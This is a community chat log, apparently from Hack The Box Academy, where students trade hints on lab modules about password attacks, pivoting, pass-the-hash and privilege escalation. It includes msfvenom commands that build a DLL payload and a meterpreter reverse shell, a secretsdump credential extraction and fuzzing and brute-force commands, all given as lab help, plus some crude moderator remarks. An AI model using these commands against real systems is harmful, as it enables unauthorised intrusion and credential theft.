#modules

1 messages Β· Page 123 of 1

tidal mango
#

Did you try the one in the reasources for that module?

tawdry vapor
#

yeah

#

username.list and password.list

tidal mango
tawdry vapor
tidal mango
# tawdry vapor

hmm that looks good to me, you can increase the number of threads, just dont go too high

fathom pendant
#

48 is my sweet spot

golden arch
#

Can i PM someone for hint in Predictable Reset Token of Broken Authentication?

potent grail
#

hey guys, i have some problems.Right now i am stuck at ICMP Tunneling with SOCKS, Pivoting module
when i run sudo ./ptunnel-ng -r10.129.218.215 -R22 target host return this issue
has anyone had such a problem ?

latent sage
#

hello friends please i need help on the Password Attacks module precisely the Linux Local Password Attacks : credentials hunting on linux
what i have tried so far is to brute force both kira and will for ssh credentials but had no match.
secondly i tried smb and got nothing don't know if i am missing something

#

ok

acoustic owl
golden arch
acoustic owl
#

This question?

Create a token on the web application exposed at subdirectory /question1/ using the Create a reset token for htbuser button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?

#

If so, read the hint

golden arch
#

i think i have done every step.. but the script doesn't give me the flag...

acoustic owl
#

what time do you take?
How many tokens do you generate?

golden arch
#

i really dont count but the scripts ends without any good response

#

idk if this conversiont is ok (2023-08-27 05:28:40am - 1693114120000)

acoustic owl
#

is this your local time or the time that is displayed on the page after you have clicked the button?

golden arch
#

Your token is: a09ef146a91a55004ed250582c1e8168
And has been created at 2023-08-27 05:28:40am

acoustic owl
#

Your script must use this time as a basis

#

From this time you now have to create tokens for each millisecond. +/-1second

winter blaze
#

Hello, i am stuck in https://academy.hackthebox.com/module/147/section/1638 | Ques : Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt. | I got the Daniel hash, and i mounted the smbshare, i mapped into the n drive on the current machine |** but idk how to pTh using the hash of daniel user in order to enumerate the smbshare that i mounted in n | any hint ?**

carmine tangle
#

Hi guys, can anyone help me with this secretsdump error?
impacket-secretsdump LOCAL -sam SAM.save -security SECURITY.save -system SYSTEM.save
[-] read length must be non-negative or -1
[*] Cleaning up...

coarse void
winter blaze
#

yeah

#

can you please help me ?

coarse void
# winter blaze yeah

You just have to pass the hash via any methods mentioned in the section, then you can access \DC01\david directly

winter blaze
#

i tried those methods

#

can i dm u ?

coarse void
#

you authenticate to MS01 then access DC01 from it

#

sure

compact jacinth
#

hello im doing nibbles for the first time Nibbles - Privilege Escalation, but when i try to wget LinEnum.sh i get error 404 file not found?

#

ive been stuck on this for hours and i cant find the solution

#

i have downloaded the LinEnum.sh but still cod 404, file not found

limber cobalt
#

Hi all. Im finishing my Academy anual subscription soon. Can I keep doing labs and reading the content of completed modules without being subscribed, right?

ocean night
#

A question best answered by our support team I think @limber cobalt - I recall this query coming up before, but cannot ensure the accuracy of my recallection as to the answer πŸ˜‰

#

I think what you say is correct

#

But yeah, don't take my word for it

vital adder
vital adder
vital adder
vital adder
potent grail
potent grail
limber cobalt
limber cobalt
ocean night
#

Again I'd advise reaching out to support for confirmation, but I believe any modules you've completed remain accessible.

limber cobalt
vital adder
gusty zinc
#

Is anyone able to give ma nudge on the skills assessment for broken authentication? I keep getting the error "User Support cannot have requested role" and i'm not sure how to proceed.

lusty thicket
desert cypress
#

Hi, I'm stuck on the Pass the Ticket (PtT) from Linux part, with the use of chisel. I have retrieved the ticket from julio and imported it into the KRB5CCNAME variable on my pwnbox. But when I run impacket with proxychain, I get a timeout and this error: |DNS-response|: dc01 does not exit . I followed the part with chisel, the modification of the file /etc/hosts by adding the ip and the domain name, the modification of the file /etc/proxichain, the launching of chisel on my pwnbox, and on ms01 with the ip of my pwnbox. PS: I use my own pwnbox, not the one provided by HTB, and I am well connected to the vpn.

#

if someone could explain why I'm getting this error, that would be great, thank you.

spring moon
#

You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer.

Any suggestions or hint without the sql injection method? I’m in mysql server with the creds I found and digging around the databases. thanks

vital adder
tribal flame
#

"Hey, is anyone here familiar with SOC analyst paths

rustic sage
#

need help !

vital adder
#

with what?

rustic sage
#

lo.l i got the problem

#

i was goin to write but i solved

#

no problem

ocean night
#

Rubber ducky debugging FTW

vital adder
tribal flame
#

Preparation Stage (Part 1)
What should we have prepared and always ready to 'grab and go'?

ocean night
#

Mo.. re-read the material

#

The answer is literally there

#

I answered as much on your support request

tribal flame
#

i read it and i think i get it but i think the problem my typing way

#

so what can i do

ocean night
#

DM me what you're entering as the answer

tribal flame
shut wraith
#

Anyone free to help me understand some DNS things

ocean night
#

What kinda DNS things o_0

#

Which module is this?

shut wraith
ocean night
#

First of all, Tier 2 module, so please don't paste material like that πŸ™‚ Check the ToS

#

Give me a moment to have a read

shut wraith
#

Thanks and my apologies

vital adder
ocean night
sick fable
ocean night
#

It's not the link itself, but other content the channel holds

sick fable
ocean night
#

F sorry @shut wraith I gotta go pick up the daughter. The command you provided will return what you need, you just need to filter the output to come to the answer

vital adder
ocean night
#

If anyone else fancies helping and giving nudges, it'd be appreciated

#

Will be back later

vital adder
ocean night
#

πŸ˜†

#

Don't feel obligated

sick fable
ocean night
#

The IP in the video, you're not literally using that exactly are you?

analog dock
vital adder
sick fable
ocean night
#

Sorry, always gotta check the easy answer

sick fable
#

maybe they just changed the machine. if somebody could check if connecting via firefox works we can see if im doing something wrong

vital adder
#

also just to make sure you use http not https right?

vital adder
sick fable
lusty thicket
vital adder
#

make sure your vpn is setup right and also it's best to try the pwnbox

sick fable
vital adder
#

try crackstation but if that doesn't work then you probably got the wrong hash

#

hint you got the wrong file

#

hint ||nope||

shut wraith
sick fable
vital adder
shut wraith
#

It was for me because he deleted my messages too

vital adder
#

oh

#

@sick fable if you already have your vpn running then try some basic troubleshoot like run ps aux | grep openvpn to see if you have 2 or more openvpn running at the same time or try switching your vpn, additionally because there is a web server running on this target you can try to curl this side for a quick connection test

#

yep 🀣 you got no idea how many people i helped have this same issue πŸ˜‚

#

did you crack the hash?

sick fable
sick fable
vital adder
#

based on a error code or a type of error i can't know for sure what's wrong but that could be the vpn so either kill all vpn and re-run your or rebooting will do the same thing

sick fable
vital adder
#

also you can't have the pwnbox and your vpn on at the same time

#

i don't have limited pwnbox so i don't know but if turning off the pwnbox mean you are done with the pwnbox for the day then don't just do it on the pwnbox

sick fable
vital adder
#

np πŸ‘ πŸ‘

high reef
#

anyone has a good smtp command cheatsheet list

#

i'm doing the attacking common services

#

easy assessment

slow wind
#

Is there an Active Directory defense module yet?

vital adder
#

not entity for defense but the closest thing is the Windows Attacks & Defense module

vital adder
slow wind
#

probably a no go then

high reef
raven fog
#

hello everyone! I am currently in the Remote Code Execution (RCE) via the Theme Editor section in the hacking wordpress module. in this section I could not find the answer to the question. can anyone help me how to do it?

pliant minnow
#

Hello friends. I have problem with authority machine, can you help me?

vital adder
viscid cedar
#

In the module Windows Privilege Escalation section DnsAdmins, why does get group "Domain Admins" /dom show the netadm user as part of the Domain Admins group but whoami /priv does not?

heady tusk
#

Hey, I'm currently stuck on the Linux Privilege Escalation skill assessment. got flag 1-3, now struggling to find a way into the tomcat webapp. from what I've read the creds can be found somewhere but it seems like I'm totally missing something. Anyone able to give me a hint?

young herald
#

Hello all. I'm currently running the Footprinting medium lab and am stuck trying to login to SSMS. I've gone through alex's directory and found the txt file with the sa password, but the password doesn't work to run SSMS as admin. One of the forums mentioned that some of the characters are not what they seem, but the only thing I could think to try as replacing the @ symbol with a period. Can anyone point me in the right direction to get logged into SSMS as admin please?

vital adder
vital adder
vital adder
viscid cedar
heady tusk
vital adder
#

you have to make this a 2 part thing make a dll payload that will run a shell and make a shel for that dll to run something like this

msfvenom -p windows/x64/exec cmd='C:\Users\netadm\reverse.exe' -f dll -o sussy.dll
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o reverse.exe
viscid cedar
vital adder
#

wouldn't recommend you name your malicious dll that but when the dll is loaded it will run the shell

viscid cedar
vital adder
#

rebooting only is one of the way one of te guy here found a way to make that way work

#

but no idea the issue is the user isn't fully added to the group so that user can't access admin stuff

#

and something like an reboot would fix that issue (just that issue)

wind anchor
#

Hey, is machines contain walkthrough just like starting point?

tranquil axle
#

There are some β€žguidedβ€œ machines, but they are all easy

formal galleon
#

Hello everyone. Excuse me if this isn't the right channel.
I'm struggling to set up WSL in my Windows VM. Apparently there's something wrong with VirtualBox and nested virtualization (https://github.com/microsoft/WSL/issues/5430). Been using Windows11+WSL for a year but recently switched to Pop!_OS as my host machine.
Has anybody succeeded? Should I just try another hypervisor? I've tried quite a few PWSH commands/approaches but none worked. Thanks.

GitHub

Issues found on WSL. Contribute to microsoft/WSL development by creating an account on GitHub.

#

PS. I tried the Enterprise Evaluation ISO as outlined in the Fundamental module, didn't work and didn't like it, the VM is running Pro N atm

leaden pond
#

I'm working on the final questiuon of the Pass the Ticket in Linux section of the Password Attacks module. I have a root shell on the linux01 machine and, following the hint, I found the file that contains the Kerberos ticket for linux01. I used keytabextract to find the NTLM hash of the password found in that file, but CrackStation, John, and Hashcat (with rockyou as well as the pasword.list provided for this module) couldn't crack the password. I'm not sure what I should do with the Kerberos ticket for linux01 to access the //DC01/linux01 share. When I try to use smbclient to access that share, I keep getting permission denied messages.

#

Let me know if that isn't enough information, and I can show the commands I've used so far to try and access the share. I just don't want to give too much away for people who haven't tried this problem yet.

low tusk
#

you guys know any free labs to test my XSS knowledge?

#

aaand how do i get my role here on discord?

sly kelp
ocean night
zinc marsh
lusty thicket
formal galleon
trail leaf
rotund sphinx
#

i dont remember how i got it working originally but i can say i regularly use WSL inside a windows 10 VM with virtualbox

i think there are some bios options that need to be set to allow nested virtualization and might only be supported on certain platforms/cpus

shut wraith
rotund sphinx
#

can anyone give me a hint for Metasploit -> Meterpreter, it just says "Find the existing exploit", from what i have found the box is running SMB + RDP so my mind went straight to EternalBlue as 1/2 the modules ive done so far have involved that, but the exploits for that dont seem to be working and nor are any of the other ones ive tried, they all seem to want credentials. am i meant to be bruteforcing some creds? or did i do something else wrong

lusty thicket
rotund sphinx
#

😦 ok so ive missed something

#

i think i may have just found it πŸ™‚

need to get back into rhythym with this stuff its hard to pick back up after a month :p

#

tbh it probably would have been disappointed if every time i was asked to find an exploit it was eternal blue but i needed an easy one to get back into things

i found something on a higher port and now have my shell πŸ™‚

wind juniper
#

where do a report a typo in a module?

ocean night
#

Thank you

leaden pond
#

I'm working on Password Attacks Lab: Medium. I retrieved Docs.zip and unzipped it to get Documentation.docx, which is encrypted. I got the decryption key for the file, but I don't know how to use the key to decrypt the .docx file

trail leaf
#

open it in libreoffice if you don't have Microsoft Office

spring moon
#

Attacking Common Services - Easy

You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer.

I found a user creds for mysql and I'm trying to read the flag.txt or connect to the system by
adding cmd injection in sql syntax it's working I can now do the dir commands from the browser but I can't navigate.
I'm stuck at xampp/docs folder

Any hint? please

trail leaf
#

You can't do cd from a webshell, it will just execute commands from whatever directory the webshell is in. If you can run dir like you say you can, just specify absolute paths in your arguments and you should be fine.

spring moon
rich wraith
#

finally completed! the labs were fun, I completed the last lab (the hardest) without any help

viscid cedar
sly kelp
#

That takes 7 hours and still gives me nothing

rich wraith
#

can you tell me whats the problem? I dont remember for that section well

trail leaf
#

Any answers you need for the odat stuff should come in before the scan completes

#

I got through it relatively quickly iirc

#

Just watch the output

sly kelp
trail leaf
#

I’m away from my computer right now, but once I get back I can take a look at it

lusty thicket
rich wraith
#

I mean there are three labs at the end of the module, and the last one is the hardest (the lab 3)

burnt knoll
#

any nudges on the "Web Enumeration" flag at the start of the pen test track? Found a few sites, got the creds for one, logged into a cryptic message - cannot for the life of me work out what to do next, can't find any roads to go down

dusk torrent
#

||once you log in that cryptic message you've found is the flag||

#

^not sure if i should tag as spoiler but just in case

burnt knoll
#

is it?

dusk torrent
#

submit it :)

burnt knoll
#

FFS, I tried that about an hour ago, first thing I tried

#

but worked just now, I thought I was going crazy - thanks for the sanity check

trail leaf
dusk torrent
austere reef
#

Can someone tell me if it is unsafe to use a dual boot instead of a vm?

proud pine
waxen furnace
#

can soemone please help me in getting answers of nessus skill assessment

austere reef
zinc marsh
#

did they change the academy?

#

I think my percentages are higher now

#

they were much lower before I think

trail leaf
#

yes

#

my offensive percent went from ~50 to ~60 and I haven't done anything since finishing the CPTS path

hallow kiln
final maple
#

Can anyone help me out with the first Documents and Reporting Question? So far, I have cracked the ||IPMI hash|| and have two other sets of creds from the notes. I have used ||crackmapexec|| and ||xfreerdp|| to try to get to DC01, but so far, nothing has worked.

trail leaf
#

go for the low hanging fruit first

#

you should be able to get DA without even looking at the notes

acoustic owl
final maple
trail leaf
#

everything you need to know about AD pentesting for CPTS is in the AD module, but having an understanding of what the quickest wins are is also important

fallow stirrup
#

do you guys pull request on your own solo project?

trail leaf
#

Depends on context but usually no

#

Go check out #welcome for information on how to verify so you can access the programming chat :)

final maple
#

I think I am on the right track...I have a good finding. I imagined what it would have been like to have a lazy co-worker and went from there, lol

final maple
#

Just got the first flag of that module

astral zinc
#

Can someone help please? I'm having an issue with HTB Academy. I'm doind the BASH fundamentals course and one of the exercises asks the following:
Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable.

I did the for loop and it iterates correctly but when it reaches 28, instead of giving me the $flag it returns this:

Counter = 28 - Assigning value to Salt
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
bad decrypt
140676000277824:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:../crypto/evp/evp_enc.c:615:
[11:40 AM]
my loop is correct, but seems like the decrypt method is deprecated?

tribal jolt
#

I can't spawn the target too

#

It keeps spinning forever

sick fable
#

i'm on getting started module, last page (knowledge check) where i have to try the first box by myself.
i have found the admin pwd from the hash, and i have found the upload menu. upload file doesnt work but reading the html source i have found that works if i turn off JS. i have tried everything but let upload only non-php files. i tried searching for other php extensions that works the same but no result. can somebody tell me if this is the right path?

sick fable
rustic sage
#

I am unable to spawn my target from the password attacks module (Pass the Ticket (PtT) from Linux). It is taking forever.

heavy ginkgo
#

Ye cant spawn here either must be a problem on their end

rustic sage
heady tusk
#

has anyone messaged support yet?

topaz shard
#

just to give a little bit of a different perspective. i seem to be able to spawn either my target OR my pwnbox πŸ˜… so if you have the option, maybe try your own VMs

heady tusk
#

I can spawn a target but it seems kinda broken and VPN also is a acting up a bit. Gonna do some more testing to figure out whats wrong

rustic sage
#

lol

heady tusk
#

which section/question exactly? I can check my notes

supple patio
#

Can you show the exact command you're using?

pulsar needle
#

Ive had it for 15 minutes now

#

or more

#

deleted the message cuz i thought they fixed it xd

heady tusk
pulsar needle
#

Ah

#

Oke

#

Yes, now it works

#

65.21% and 22/36 on the AD module

supple patio
#

Wait a while

pulsar needle
#

wby?

supple patio
#

Isn't it mutated loveme one?

#

So, it should crack

pulsar needle
#

Nicee, almost 50%πŸ’ͺ

supple patio
#

Mutated of loveme

#

You don't have to use others

astral zinc
fiery berry
# astral zinc yup

can you show me the code you wrote? I don't need all the code just the one you need to implement and put it in spoiler tags otherwise I'll dm you. Up to you

raven locust
#

doing the vulnerability assessment module atm and there's two questions in both the nessus & openvas chapters where you're asked what IP address the hosts you scan use, but they're just in the description of the module as well

#

free cubes i guess but still

sly kelp
#

Guys I am unable to spawn any target

#

Changed the vpn to Tcp

#

Still not working

tribal jolt
#

I was able to spawn a target after 1 hour of trying over and over and over again

#

But now it said "Something went wrong while generating your VPN Key, if this persists please contact support"

heady tusk
#

yeah I messaged support already. they're investigating but dunno what the progress is looking like

lapis pelican
#

Same issue as well.

sick fable
#

i'm on getting started module, last page (knowledge check) where i have to try the first box by myself.

im trying to find the right exploit with searchsploit but i cant find it. i have found all the versions that the webserver is using, and i think that the key is to use GetSimple CMS 3.3.15 or something but isn't working. can somebody give me a hint?

gloomy bramble
weak stirrup
#

is anyone available to help me understand what i am doing wrong with a xfreerdp command for the Documentation and reporting module. I have been constantly confused at the directions.. and the report already started in the module gives creds and i can none on them to work. so i am assuming it is a bad xfreerdp command but could be something else.

raven locust
#

feel free to dm if u prefer

hybrid timber
#

Is anyone able to flag my account to get past the onboarding screen? It's stuck on it and loads directly to it even if I clear all browser files and cache.

sleek shell
#

Can someone help me with skills assessment in Shells and Payloads chapter?

alpine ridge
#

yo guys, im currently doing the live engagement in shells and payloads section 2, ive currently rdp'd to the ip we got given and got the answer to question 2 but now im stuck. After looking at the hint it says you can browse to the ip hosted on port 8080 or status.inlanefreight.local but for the life of me i can not find a broswer on the rdp box or access it on my kali machine, an help appreciated

lusty thicket
smoky chasm
#

Hello, attacking common services : hard, I keep getting this now and it was working fine before, reset machine and my own VM, baffled

hallow kiln
#

The whole academy is there to teach you

#

And honestly your description constitutes a serious rule break imo

#

<@&861185840277487616> haven't dared use this tag before but ... general rules, rule #3, look at this guy's about me, appalling in my opinion

shut wraith
#

ATTACKING WEB APPLICATIONS WITH FFUF

Skills Assessment - Web Fuzzing

Question:

Before you run your page fuzzing scan, you should first run an extension fuzzing scan. What are the different extensions accepted by the domains?

First command:
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://$IP/indexFUZZ -fs 985

.phps found

Second command:
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://$IP -H "HOST: academy.htb/indexFUZZ" -fs 985
Nothing
Third Try
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u archive.academy.htb/indexFUZZ
Nothing
Tried to fuzz multiple locations in command using custom sub list made from previous question where I successfully found subs:
ffuf -w subs.txt:SUBS,/usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://$IP -H "HOST: SUBS.academy.htb/indexFUZZ" -fs 985 -fs 0
Nothing
Any help would be appreciated

hallow kiln
#

thank you!

winged hedge
#

Feel free to let us know If you see anything against TOS or something potentially harmful and/or insulting in the future.

shut wraith
#

Hey @winged hedge can I please get your incredible input on my question (very please)

winged hedge
alpine ridge
#

yo guys, im currently doing the live engagement in shells and payloads section 2, ive currently rdp'd to the ip we got given and got the answer to question 2 but now im stuck. After looking at the hint it says you can browse to the ip hosted on port 8080 or status.inlanefreight.local but for the life of me i can not find a broswer on the rdp box or access it on my kali machine, an help appreciated

faint rampart
# shut wraith # ATTACKING WEB APPLICATIONS WITH FFUF ### Skills Assessment - Web Fuzzing Que...

you might wanna reduce the lengthyness of your questions, makes it hard for anyone who wants to help you. From what I see here, you are running an extension fuzz on the wrong vhost, you get nothing because you are fuzzing on the second-level domain/just the domain name and not all vhosts, which is why you wouldnt get the extensions accepted by the domainS
When you figure out the vhosts, you can use a bash script one liner to fuzz all at the same time for valid extensions something like `for vhost in vhost1, vhost2; do ffuff <SNIP> ; done

faint rampart
alpine ridge
lusty thicket
whole robin
#

Dog

#

What are u guys coding?

alpine ridge
faint rampart
alpine ridge
#

thank you tho

lusty thicket
fathom pendant
#

Just firefox should work... the & makes it background

proud pine
#

You're running the terminal as root, which is why it can't find the display.

fathom pendant
#

Also: you should almost never be running as root. There's little to no point in it

lusty thicket
alpine ridge
weak stirrup
#

in Powerview.ps1 there is a command Get-NetLocalGroupMember I am trying to use this tool to find remote powershell capable users for a module. an example command given Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users" gets me, if i understand, who can RDP to the box but I cant find documentation on what GroupName is associated with remote PS. can some one guide me to some documentation that gives a hint? The module only seems to cover bloodhound examples... i have tried to list the groups with the command net localgroup but don't see anything that looks to be related to powershell

violet tundra
#

Hello guys, is it possible to use responder in analyze mode with ligolo ?

#

sudo responder -I ligolo -A set up the interface for ligolo, but i do not get any llmnr nbt-ns response

faint rampart
pulsar needle
#

Active Directory Enumeration & Attacks - Privileged Access. I haven't been able to RDP to the host for the whole day (When I was able to I got a black screen)

faint rampart
pulsar needle
#

I have 0 errors

pulsar needle
#

Ah now it works (with another rdp client)

#

weird

#

Why does it say the password is wrong?

faint rampart
#

like DOMAIN\User

pulsar needle
#

A

#

I had to specify inlanefreight for some reason?

#

F

dapper flax
#

Hey could anyone help me for the RCE prototype pollution part in HTB Academy ?

jaunty vigil
#

anyone did the assembnly module ? i am on the skill assessment i was able to get shellcode but its not executing. id love any help πŸ˜„

keen oasis
pulsar needle
#

aaa

#

oke

zinc marsh
#

someone could sanity check, not sure if the answer is bugged

#

or I am just dumb lol

#

nevermind I was submitting the user lol

clever mural
#

Hi , just started explosion, answered first question and now next one is not opening , got stuck; refreshed; logged out, and logged in again, seems no solution ... help anyone ?

topaz shard
clever mural
#

@topaz shard thx for informing me and yes i had the wrong channel, just wanted help, i'll be more carefull next time , thx a lot

smoky chasm
#

Hello asking again as stuck still , Attacking Common Services : hard, I keep getting this now and it was working fine before, reset machine and my own VM, baffled

leaden pond
#

I'm working on the last question in Pass the Ticket from Linux in the Password Attacks module. The question asks me to find the Kerberos ticket for the machine Linux01 and use that to find the flag in \DC01\linux01. I found the file containing the ticket for the Linux system (I have root privileges, so I can access this ticket), and I transferred the ticket back to my attack box. I don't know what to do from here. How do I use the ticket to gain access? If the target were a Windows machine, I would use Mimikatz or Rubeus to pass the ticket. Not sure what to do with a Linux target.

faint rampart
leaden pond
#

Yes, that's what I'm trying to do. I have the ticket corresponding to the machine LINUX01, and I want to use it to access the share \DC01\linux01. But I'm blocked on using the ticket to access the share.

flint chasm
#

Hello
Maybe someone know how to connect to SMB and read the flag in second question of
Attacking Common Applications
PRTG Network Monitor?
I got the username and password but idk how to connect to smb
I also got the info about the shares

rotund sphinx
faint rampart
lusty thicket
leaden pond
#

When I use keytabextract to get the NTLM hash from the keytab file, the hash is not crackable by John, Hashcat, or crackstation.

leaden pond
#

Thank you! I just got it. I was using the @inlanefreight.htb domain in my kinit command, but it's just LINUX01$ without the domain. I don't fully understand why though.

#

Also, thank you @faint rampart

shut wraith
lean grove
#

Hi, did anyone finish the skills assessment in introduction to malware analysis and can help me with one of the questions?

fleet bramble
#

did anyone do Introduction to splunk & SPL module?
im currently stuck at the practical exercises

acoustic owl
#

@lean grove @fleet bramble
Just ask the question.
Yes, someone has certainly completed the module

topaz shard
#

I am doing the footprinting lab - hard and i found my way to the private key. i created a file called id_rsa and put the key in there and chmod'ed the permissions to 600. when i try to ssh using this id_rsa file, i get an error saying 'Load key "id_rsa": invalid format'. sooo, what file type does this file usually have? anyone, please?

sick fable
#

how does student subscription works for modules, if i unlock one module i will be able to use it even after the subscription?

acoustic owl
sick fable
topaz shard
#

CPEs are for certificates

acoustic owl
#

With the modules you can earn CPE credits

sick fable
#

oh ok, thx

topaz shard
#

@acoustic owl since youre here, can you help me with my question? can you say anything about that?

acoustic owl
#

I do not know for sure. Do you have line breaks or extra spaces in the content?

topaz shard
#

so you suspect an error while copying the key itself rather than something with the file?

fleet bramble
harsh flare
#

Hello guys, my basic knowledge about OOP tells me that you can't declare a "full" object of a class untill you fully define the class (but you can declare a pointer of that type), but when you overload an operator for that class you just define a function that takes an object of the same class as a parameter, i know this works, but can someone help me understand why or how this WORKS anyway??πŸ˜…

fleet bramble
acoustic owl
#

Then take a break. Read through the section again and then try again.

#

Try to find out how the event is logged

topaz shard
# acoustic owl Yes

as far as i am concerned, the key looks good. no weird line breaks or spaces in there.

#

mind if i send you a screenshot of the key in a DM?

acoustic owl
#

The key is a text file. The name does not matter in principle. I often call it username.key

acoustic owl
topaz shard
#

every row

#

except the last

#

is the .key important? ive just got it as id_rsa with no file type

acoustic owl
#

Try to write everything in one line.

acoustic owl
#

You can name the file whatever you want.

#

ssh -i /path/tp/your.key username@ip

topaz shard
#

oh yeah, this is probably gonna be stupid, but... i do need the public key as well, right? πŸ˜…

#

or is the private key alone enough to login with ssh

acoustic owl
acoustic owl
topaz shard
#

so the last line is an empty line?

acoustic owl
#

Yes

topaz shard
#

that was actually it

#

thank you very much

craggy gyro
#

while using hydra i get this error "target ssh does not support password authentication (method reply 4)." What should i do? Module is login brute forcing thinkpad

thorn urchin
#

Pick something else to brute

runic remnant
#

is it me or has the vpn or connection been really weird lately?

runic remnant
clever ingot
#

What is the best way to esclate priv during an ssh attack?

proud pine
clever ingot
#

@proud pine but you have to get root access on ssh sometimes, and what i'm asking, what is the best way to approach it, trying to learn here

#

to clarify, i mean you could ssh with a user you already know but how is the best way once inside to get root

proud pine
odd dawn
#

Hello ☺️ I'm currently stuck on the module "introduction to malware analysis" on the skills assessments section, 4th question. I have no clue how to get through it and have no idea if I even approach it the right way. Is anyone willing to guide/help me? Thanks in advance! Feel free to dm me as well

clever ingot
proud pine
clever ingot
#

to get the Notes.zip file and decrypt it, i have tried scp to get the file and decrypt with john

clever ingot
#

yeah and it said permission denied

fathom pendant
#

How is it permission denied if you're doing that on your own system

#

Transfer zip > Crack it

clever ingot
#

you can't transfer it with scp, i tried that that was my original plan

fathom pendant
#

There's more ways to transfer than scp

#

See the file transfer module

clever ingot
#

Tried rsycn and curl and both "Permission denied"

ebon coral
#

There are other possible methods. The other method might work with just copy+paste

rustic sage
#

what is different between absolute or relative sequence number And how do I differentiate between them؟

#

+if any one end network analyze module can help me?

clever ingot
ebon coral
#

Looks like you don't have permission for the file itself not the services/apps you wanted to try

#

You might need to find or pivot to the owner of the file first

clever ingot
#

root is the owner of the file

ebon coral
#

Who has read access? Maybe there are other users with read access

#

I recall that didn't belong to root before though. It was found in one of the users only

clever ingot
#

yeah i thought it was weird too because i did locate Notes.zip and that is what is showed

ebon coral
#

You're in the protected archives section of the password attacks module right? It should belong to kira

#

I checked the file and it does belong to kira

clever ingot
#

Yeah for some reason locate showed it in root, i found it kira, i wrote a script to go through all users to find that file.

#

I just uncracked it

#

thank you @ebon coral

ebon coral
#

You're welcome

rustic sage
#

what is different between absolute or relative sequence number And how do I differentiate between them؟

rustic sage
#

???

tender yarrow
#

sorry been away for the weekend, here is the screen shot, I must be missing something really simple! Or I am completely stupid! I cant even paste an image here!!!

tidal mango
nimble citrus
#

it's like everytime i click unlock layout of the web page change

fathom pendant
fathom pendant
nimble citrus
#

it work, thanks

quasi wave
#

Hi I am thinking after I complete Nmap module I may switch from CPTS path to CBBH. I feel like that way I can focus on one type of hacking which feels more linear. I want to be good at web anyways. I think bug bounties would be great way to gain advanced web app hacking skills.

#

I’m gonna study some web development to go with it. But my thinking is I want to get it out of the way.

ebon wharf
#

Anyone here solved the secure coding javascript 101 module? I have the question about the last question of the skill assessment, which script I have to upload? The vuln.js or check.js?

proud pine
tidal mango
final maple
#

Just finished the Documents & Reporting module...that lab was a doozey!

plain coral
#

Can I get a hint on this one, please?

Password Attacks
Credential Hunting in Linux
Examine the target and find out the password of the user Will. Then, submit the password as the answer.

Have found the attack vector, having trouble transferring the file to the attack host as I can't load the tool that got deleted in .bash_history

silver mesa
#

Login the kira in ssh and run python server. then you can download to your local vm.

autumn pilot
#

Or you can use scp

last sorrel
#

Module Shells & Payloads The Live Engagement Host -2: getting error when running 50064.rb exploit. The error is NoMethodError undefined method β€˜get_cookies’ for nil:NilClass. Does anyone know how to fix this? Thanks.

placid quest
#

@autumn pilot or use pwncat

acoustic owl
ebon wharf
acoustic owl
ebon wharf
#

lol really pumkin

#

so i just need to validate the ip?

#

isn't the password is in the eval function?

acoustic owl
#

Yes, but think about how to get rid of them

ebon wharf
#

so not using the eval i guess? hmmmHug

acoustic owl
#

eval is evil

ebon wharf
#

i see hmmmHug

vital adder
#

keep asking thing like that and you will get the πŸ‘’ read the #rules kid

vital adder
#

no

flint notch
#

k

flint notch
vital adder
#

again stop asking for dump shit you will get the πŸ‘’in your ass

odd dawn
acoustic owl
odd dawn
# acoustic owl What exactly is not working? What do you need help with?

I'm completely clueless as to how to even approach it. It's a bit difficult to explain at the moment since I'm at work right now πŸ˜…, just trying to find someone who could help by the time I'm home. Can I dm you and explain it in more detail in like 5 hrs from now? Maybe even earlier a bit.

acoustic owl
odd dawn
turbid kraken
#

Hey guys, on modules where you have to RDP into a host to access a subdomain. Is there a way to pipe my machine throught he RDP node? My issue is that I'm dead tired of having to use weird computer configs to work and would like to have my own tools on hand. Any idea?

TL,DR: I want to pipe my host through a RDP I have access to to access it's subnet

shut wraith
glossy trail
#

Under Linux Fundamental -> task scheduling -> Questions

Answer the question(s) below to complete this Section and earn cubes!

What is the type of the service of the "syslog.service"? , I've tried using systemctl command to list all services and also trying out every 'type' possible for the answer but it shows ERROR!

pliant flare
#

Anyone else having trouble connecting to the RDP on the Windows Privilege Escalation Module under the SeImpersonate and SeAssignPrimaryToken section?

fiery berry
fiery berry
pliant flare
#

Yup

#

xfreerdp /v:10.129.222.108 /u:sql_dev /p:'Str0ng_P@ssw0rd!'

fiery berry
#

of the error message

pliant flare
#

Im trying to upload a ss it wont let me

fiery berry
vital adder
heady tusk
pliant flare
heady tusk
#

yeah I've been there too. happens 🀷

raven locust
# glossy trail

why are you searching for all services? try searching specifically for the service the question asks for

sonic field
#

Probably some issue with the infra?

glossy trail
heady tusk
raven locust
sonic field
#

[08:47:26:370] [99488:99489] [ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]

#

I think theres some issue with the machines on the windows privesc module from my understanding

heady tusk
#

have you tried the two classics? resetting the machine and switching VPN

sonic field
#

Good ideia let me try other vpn profile

sonic field
heady tusk
#

try contacting support then, they can probably help you

sonic field
#

Will do, thanks!

pliant flare
sonic field
#

You still having issues?

pliant flare
#

I seem to be able to connect via RDP on most boxes, but its not the smoothest experience on these boxes. I face lag or the session automatically closes sometimes haha

sonic field
pliant flare
#

